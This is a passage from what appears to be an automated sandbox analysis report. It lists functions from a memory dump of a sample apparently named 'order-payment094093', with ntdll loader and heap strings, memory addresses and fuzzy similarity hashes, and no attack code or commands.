Instruction Fuzzy Hash: 69417371E2020AEBDF11DBE8C885FEEBBBDAB54710F14416EE609B7284D7749A44CB50

Function 012B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 012B4172
@, xrefs: 012B4225
LdrpResValidateFilePath Enter, xrefs: 012B4160

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: b28e63d7e5b562eae505cf82984474ae64a5f051bcbae831600fa53bfe5edf84
Instruction ID: 4f4dfe81d1082f226e211cf0ac0a63e71067ebe2deed7c0765b6e7ab60cc7e44
Opcode Fuzzy Hash: b28e63d7e5b562eae505cf82984474ae64a5f051bcbae831600fa53bfe5edf84
Instruction Fuzzy Hash: 2F41F6719306998BEB25EB98C8C4BFDBBB8FF55380F140469DA02EB792D7749901CB50

Function 012A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 012A488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 012A4888
minkernel\ntdll\ldrredirect.c, xrefs: 012A4899

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 1340750e698e33f3fa9dca32cfb3adcb6c5324513adc18bf3bcb3c2baf07fbd4
Instruction ID: ea7f6dfe87aad010ebceb1c8280b7eb6fc693f916616e601581ac5b8aa3d3d40
Opcode Fuzzy Hash: 1340750e698e33f3fa9dca32cfb3adcb6c5324513adc18bf3bcb3c2baf07fbd4
Instruction Fuzzy Hash: DB41D332A243D29FCB26EE5CEC41A267BE5EF49B50F89016DEE4597251D3B0D800CB81

Function 01230BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01285449
HEAP[%wZ]: , xrefs: 01285431
HEAP: , xrefs: 0128543E

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 378f5192224de59d97b08856329506aa3ab8d24273b0f2f7d6df736e741e3d5f
Instruction ID: 38c45d09ef578cea27f98809729ac44512cc2c3f3936c0bae2d940cf9a086511
Opcode Fuzzy Hash: 378f5192224de59d97b08856329506aa3ab8d24273b0f2f7d6df736e741e3d5f
Instruction Fuzzy Hash: 9F11D271336142DFDB1DEE1CC442B79B3A6EF90615F188119F506CB695EB70D841CB64

Function 012A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 012A20FA
Process initialization failed with status 0x%08lx, xrefs: 012A20F3
minkernel\ntdll\ldrinit.c, xrefs: 012A2104

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: e3f71e304e23fe92852349a3ac08bb5c975ae51aaaaee477f737f13ff11ce3b5
Instruction ID: ed1f1e0d71877274cc2414f35689e407f7c957478e5c180506b9efecc35c9e6f
Opcode Fuzzy Hash: e3f71e304e23fe92852349a3ac08bb5c975ae51aaaaee477f737f13ff11ce3b5
Instruction Fuzzy Hash: A1F02235660309EBE725EA0CCC46FA9376CFB41B18F900059F700772C2D2B0AA40C690

Function 012303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01284D8A

Strings

#%u, xrefs: 01284D82

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 97034bf6ed5ea8c5b5b667b358991866f8542e6225ef88717a757c24c34d5e6a
Instruction ID: 50edcd5ebcc56f361f201cd6b295bf9328708a87c8a9973cdfc6b0ed88f0ef04
Opcode Fuzzy Hash: 97034bf6ed5ea8c5b5b667b358991866f8542e6225ef88717a757c24c34d5e6a
Instruction Fuzzy Hash: A9715DB1A2014A9FDB01EF98C985FAEB7F8FF58304F144065EA05E7291E634EE41CB64

Function 0122A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0122AA13
LdrResSearchResource Exit, xrefs: 0122AA25

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: e6160313b73a68d0ad15489b27d5ccfb0515d3a93e250ed3fd691f0228590dcf
Instruction ID: 9f2678aa30eff5ded6b5e698968f036b166a46d66b01256e34e2d6b4bb67336a
Opcode Fuzzy Hash: e6160313b73a68d0ad15489b27d5ccfb0515d3a93e250ed3fd691f0228590dcf
Instruction Fuzzy Hash: 00E17571E2122AEFEB21DE98C980BADBBB9FF14710F144425EA01E7A91E774D941CB50

Function 012EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 012EA44B
`, xrefs: 012EA551

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 48c1355241b12dc3a9f16c736cc080f059ba226203420688eb56846b7702f894
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 59C1CF312243429FEB24CF28C849B6BBBE5EFD4318F484A2DF6968B290D7B4D545CB51

Function 0129E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0129E751
Legacy, xrefs: 0129E75A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 31ad98b6279bb6a47d1fd29104ab5e0fbdd96d879d8fe2a07f8f16a576e7c0b2
Instruction ID: f973dd0cbef68a970fab3dd89daa3466f2167e060a5d07a8849a27815a2f4a27
Opcode Fuzzy Hash: 31ad98b6279bb6a47d1fd29104ab5e0fbdd96d879d8fe2a07f8f16a576e7c0b2
Instruction Fuzzy Hash: 2C6149B1E20619AFDB15DFA8C940BBEBBB9FF58700F15402DE649EB291D731A940CB50

Function 012C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 012C4525
@, xrefs: 012C4437

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: fde63eb9855788b05034213dc7650b15884a6aca029f4d4fb8a77cdc456a5ba2
Instruction ID: 156f8e58c53aedf4cc330d5ea1a9a7966f8af6913e10e94dab388d4938d952d6
Opcode Fuzzy Hash: fde63eb9855788b05034213dc7650b15884a6aca029f4d4fb8a77cdc456a5ba2
Instruction Fuzzy Hash: FE513BB1D1025EAFDB11DFA9CC90AEFBBBCEB54B54F100629E611B7290D6309E45CB60

Function 012204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0122063D
kLsE, xrefs: 01220540

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 61a7fff7f3790328ee816a24546d00f5c799d2102e3c4928db1407c952dd5cd6
Instruction ID: 2fd1c147d5be67b47c0a4587d6feecdc997453aa769ab4dd3fd727d7df17b266
Opcode Fuzzy Hash: 61a7fff7f3790328ee816a24546d00f5c799d2102e3c4928db1407c952dd5cd6
Instruction Fuzzy Hash: 1651ACB1524753AFD734DF68C4446ABBBE4AF84304F10483EFAAA87241E770D545CB9A

Function 0122A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0122A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0122A309

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 3acbc6bc5237dc98d7ed5820dcbe043d31bb6779ce124970a04e4ebabb8da192
Instruction ID: 4f60e16715470a166127b5c31fdb559a860a0e1d34355ee36619b87a00ada853
Opcode Fuzzy Hash: 3acbc6bc5237dc98d7ed5820dcbe043d31bb6779ce124970a04e4ebabb8da192
Instruction Fuzzy Hash: 5D41C170A2566AEBDB25DF5DC440B6DBBB4FF84700F244069EA01DBA91E3B9D900CB50

Function 0125A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0125A5E9
Cleanup Group, xrefs: 0125A5E4

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 44a7f575af520143cb593a58f5de28a34d320ff281f5cb5d6ac44027000f2053
Instruction ID: 0d3fc58b417523bca2d698a349e9c88274f9c4ac1905ce41e58375c5bcf47e17
Opcode Fuzzy Hash: 44a7f575af520143cb593a58f5de28a34d320ff281f5cb5d6ac44027000f2053
Instruction Fuzzy Hash: 4801FFB2260700AFD361DF24CD86F267BE8F794B25F018A3DAA48C7190E374E804CB56

Function 0122C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0122C8C3, 0122CA40

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 4f1f32cb9cb1d46bb8a3810954f3956d426243b90bdfb4f936fe43ac65f9f5b3
Instruction ID: f775e298259fae1c5e90b74349b3fd6948e915a42eaea45310e26c43d4ce5175
Opcode Fuzzy Hash: 4f1f32cb9cb1d46bb8a3810954f3956d426243b90bdfb4f936fe43ac65f9f5b3
Instruction Fuzzy Hash: C8827F75E20229AFEB25CFA9C8407EDBBB1FF48310F148169DA19AB351DB749941CF50

Function 012A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 012A65C1

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 24892ac0520827c3dadfd1e6085f6cdf4c499f1dce23cf915f3b6aa9d55ef212
Instruction ID: 927fc3d82ef381f4d32f490297d5023d99d2557411d98872ebcad388874dd115
Opcode Fuzzy Hash: 24892ac0520827c3dadfd1e6085f6cdf4c499f1dce23cf915f3b6aa9d55ef212
Instruction Fuzzy Hash: 8991827196021AAFEB25DF95DD85FAEBBB8EF14B50F540015F700AB190D774AD00CBA0

Function 012CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 012CE1FA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2eb4eea8289816b6cccfc2db6e7678a5d5613e56a47c9413e4229ee514a4a2c0
Instruction ID: c063f61f42e626baba29d2a4812fa76f0cdd3a9ddc36c48a23b95afffa96182c
Opcode Fuzzy Hash: 2eb4eea8289816b6cccfc2db6e7678a5d5613e56a47c9413e4229ee514a4a2c0
Instruction Fuzzy Hash: 4191B172920646AFDB22ABA5DC44FBFBF7AEF95B40F110119F700A7250DB74A901CB51

Function 0125A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 012967C9

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: b5ede26128fa8298ec67a04ea9ac6a378d3a40572f15369f540af35238690ef9
Instruction ID: d7fd3627d032a9a8a06e6ad1c06dc114b4bc1aec3b0cfdb267a029ca49cbcd67
Opcode Fuzzy Hash: b5ede26128fa8298ec67a04ea9ac6a378d3a40572f15369f540af35238690ef9
Instruction Fuzzy Hash: 8E716DB5E2020A9FDF29CF9CD591AEDBBF1FF48700F14812AEA05AB241E7748945CB50

Function 012C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 012C4A7F

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 0ab6a32e9446589cba4faac0835b722546f6a4055dafe2301c47cc6cf21c11e5
Instruction ID: 316051aa217065a83fdea20a36e8a13ecb2f2600adbb29f28422da644e0f4012
Opcode Fuzzy Hash: 0ab6a32e9446589cba4faac0835b722546f6a4055dafe2301c47cc6cf21c11e5
Instruction Fuzzy Hash: 2F518272D2026ADBDB14EF99D960AAFBAB4AF14A10F05422DEB11B7240D3749901CBE4

Function 0123E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0123E6A4

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 66114ca1ecfc7c1a1d430a17e000f4e0b738a4792c223de99386982c81b8e0f5
Instruction ID: e215fdedbb8c11b52e33365f531f03e5364b57d8a46dd16eb69d8eb0be97e4fd
Opcode Fuzzy Hash: 66114ca1ecfc7c1a1d430a17e000f4e0b738a4792c223de99386982c81b8e0f5
Instruction Fuzzy Hash: 9B41C0B2528302ABD725DA75C841B7BB7E8AFD8714F05092DFA84E7180E774D908C796

Function 0129C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0129C77F

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 8151ffc070f2a3480fe926aac654e28ae0664aaf8deab8aebc9682c6b8428cfc
Instruction ID: 6e46b9a4988113add844bed7e710de57fa4ce0628f2450da78c556243cb9ed67
Opcode Fuzzy Hash: 8151ffc070f2a3480fe926aac654e28ae0664aaf8deab8aebc9682c6b8428cfc
Instruction Fuzzy Hash: E74143B1D1012DABDF21DA54CC84FEEB77CAB44714F0045A5EB08AB180EB709E998FA4

Function 012B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 012B6B91

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: c44a31935fd8c94dc9a45864ffeb5b87887595b04202c579f12912119e5f1a63
Instruction ID: 14a4c67300a7e3ba1f2fe9edb0694274fa2a9d02eadb4f389e2c3c86cf177423
Opcode Fuzzy Hash: c44a31935fd8c94dc9a45864ffeb5b87887595b04202c579f12912119e5f1a63
Instruction Fuzzy Hash: CD316B31A2035A9BEB22DF68C884BEEBBB8DF45744F144028EA40AB282D775DC05CB50

Function 0129CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0129CAA2

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: e6f61a2ea069a934a5cf2cef9065630d4dde029cfa4331d6fc596b15534196cf
Instruction ID: afbb5e954a1a76393b3ddb24bb125f9500515c16eba0376c21e40fe1d43fe2b7
Opcode Fuzzy Hash: e6f61a2ea069a934a5cf2cef9065630d4dde029cfa4331d6fc596b15534196cf
Instruction Fuzzy Hash: 1C310376920516AFEF16DA5CC861E7FBB74EB90760F014129EA05A7290E7309E10DBE0

Function 012A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 012A895E

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 24ffa820fd993ac093ed2054ca28bce9bc01556a3eef8c44b6b7a9742da76c68
Instruction ID: a200508be550167c6b902cb2537b1adf7cebe62ab19453721e003038a1ed1a7a
Opcode Fuzzy Hash: 24ffa820fd993ac093ed2054ca28bce9bc01556a3eef8c44b6b7a9742da76c68
Instruction Fuzzy Hash: 6101F732230217ABE7256B5AC884BAA7F75EFCA755F84002CF74106655CB606882C792

Function 012C2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9ed60db75ab038b5ce284907a8c76c755edda8a934c8a230ead8a2b0b54a4e
Instruction ID: 55a01a1d194a8badf66900bf4f2b2531df3e9aaac0e0ba5d3ffef5c5218a433b
Opcode Fuzzy Hash: 5d9ed60db75ab038b5ce284907a8c76c755edda8a934c8a230ead8a2b0b54a4e
Instruction Fuzzy Hash: 2342B475628342CBD725CF68C890A6BBBE5FF98B40F040A2DFB8697250DB70D945CB52

Function 012B8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16755b8fcd6f918c52ea24157edd386a7912fd8353326d5eb90f25995ff7b723
Instruction ID: f9ffae62497382592261635dc284fdd862b4fc9a9268783a0a199c06b5e72e43
Opcode Fuzzy Hash: 16755b8fcd6f918c52ea24157edd386a7912fd8353326d5eb90f25995ff7b723
Instruction Fuzzy Hash: 07424D75A202198FEB25CF69C881BEDBBF9BF48340F148099EA4DEB241D7349985CF50

Function 01232840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710214ccdda147cf571e4eb4a415ea3284c18550d8ee3639d201eb72ab85da38
Instruction ID: 3f623d01b40b3ab4dfa4e8f1e8c338ccc8fcacff3c7d132fca4cc3ede08abad0
Opcode Fuzzy Hash: 710214ccdda147cf571e4eb4a415ea3284c18550d8ee3639d201eb72ab85da38
Instruction Fuzzy Hash: 7132F0B0A217568FEB25EF69C8447BEBBF2FF84304F24411DD64A9B284D775A806CB50

Function 012CA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f33ff041caece9e988b7c159333ecba8645e19006aebab81df9046a0be09ec
Instruction ID: c42c6e057c9c53a6a89f96fefe518a474b7005b9db31577b7e9b1cb2dc1ed25a
Opcode Fuzzy Hash: 90f33ff041caece9e988b7c159333ecba8645e19006aebab81df9046a0be09ec
Instruction Fuzzy Hash: 2B22CD7063466A8EEB25CF29C055376BBF1BF44B40F18865DDB868B286F3B5D442CB60

Function 01226A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4465e90a187eb28ed8be0b4e0583d6a08fad203b1e58f4b2a75bdf2462bb15a0
Instruction ID: cb56fcc4355f35b89491cded0060cef9139efc298f4986dd3d9e753d28625ca0
Opcode Fuzzy Hash: 4465e90a187eb28ed8be0b4e0583d6a08fad203b1e58f4b2a75bdf2462bb15a0
Instruction Fuzzy Hash: 8632F171A21216DFDB25DF68C480BAEBBF1FF48300F148569EA55AB391D770E852CB50

Function 01244A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: d8aa18ba45e0f9916574ec069dd2e9d5ec786c50353268a097fa00eb3888bbe1
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 5CF19171E2125A9BDF19EF99C580BBEBBF5BF48714F088129EA41AB340E774D841CB50

Function 012B892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6bde7c5b22d96f352cd57eaf0d7a0edd34ba348b2ffd268a93416622dfeca5
Instruction ID: 5ccb66ca612b5d41c82f053e1e0f9567798ded2ffe9da5b15d041f72ea7469c2
Opcode Fuzzy Hash: be6bde7c5b22d96f352cd57eaf0d7a0edd34ba348b2ffd268a93416622dfeca5
Instruction Fuzzy Hash: F6D1F571A2060A8BDF09CF69C881BFEB7F9BF84344F188169D959E7241E735E905CB50

Function 012265D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01cf5ce4bb3c2281c6cd5d655653344f456b4afccfcdc095683ea47a3ec5ff35
Instruction ID: b472c2822463e786f862263e396237384e1a910d2814bb3b8f183af775cac9ae
Opcode Fuzzy Hash: 01cf5ce4bb3c2281c6cd5d655653344f456b4afccfcdc095683ea47a3ec5ff35
Instruction Fuzzy Hash: A5E19E72619352DFC715CF28C090A6EBBE0FF89304F04896DEA9987391DB71E905CB92

Function 01218397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d84f602928d50621436b3a435fa4d8b8aa00ce70266acf8bea94d8d46ffb1e5
Instruction ID: 9f4160215077722db3985485915d470c32d52539f0b1fcf3a007f33f3a80611c
Opcode Fuzzy Hash: 6d84f602928d50621436b3a435fa4d8b8aa00ce70266acf8bea94d8d46ffb1e5
Instruction Fuzzy Hash: 8BD1D071A2020B9FDB18CF68C8C1ABBB7E5FF64314F054629EA16DB284EB70D951CB50

Function 012A8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 39af4105cd2611680b8000b08c5aa11797943be6f9777c1c5ae8ad542b222ed5
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: C7B18474A106069FEB24DF99C940EBBBBB9FF84305F90445EAE4297790EA34E945CB10

Function 01230535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: a290460cfc8e68ed5b22e4bb61caa7a8b2cab0f32abf919fd6512a5b1a5c0c04
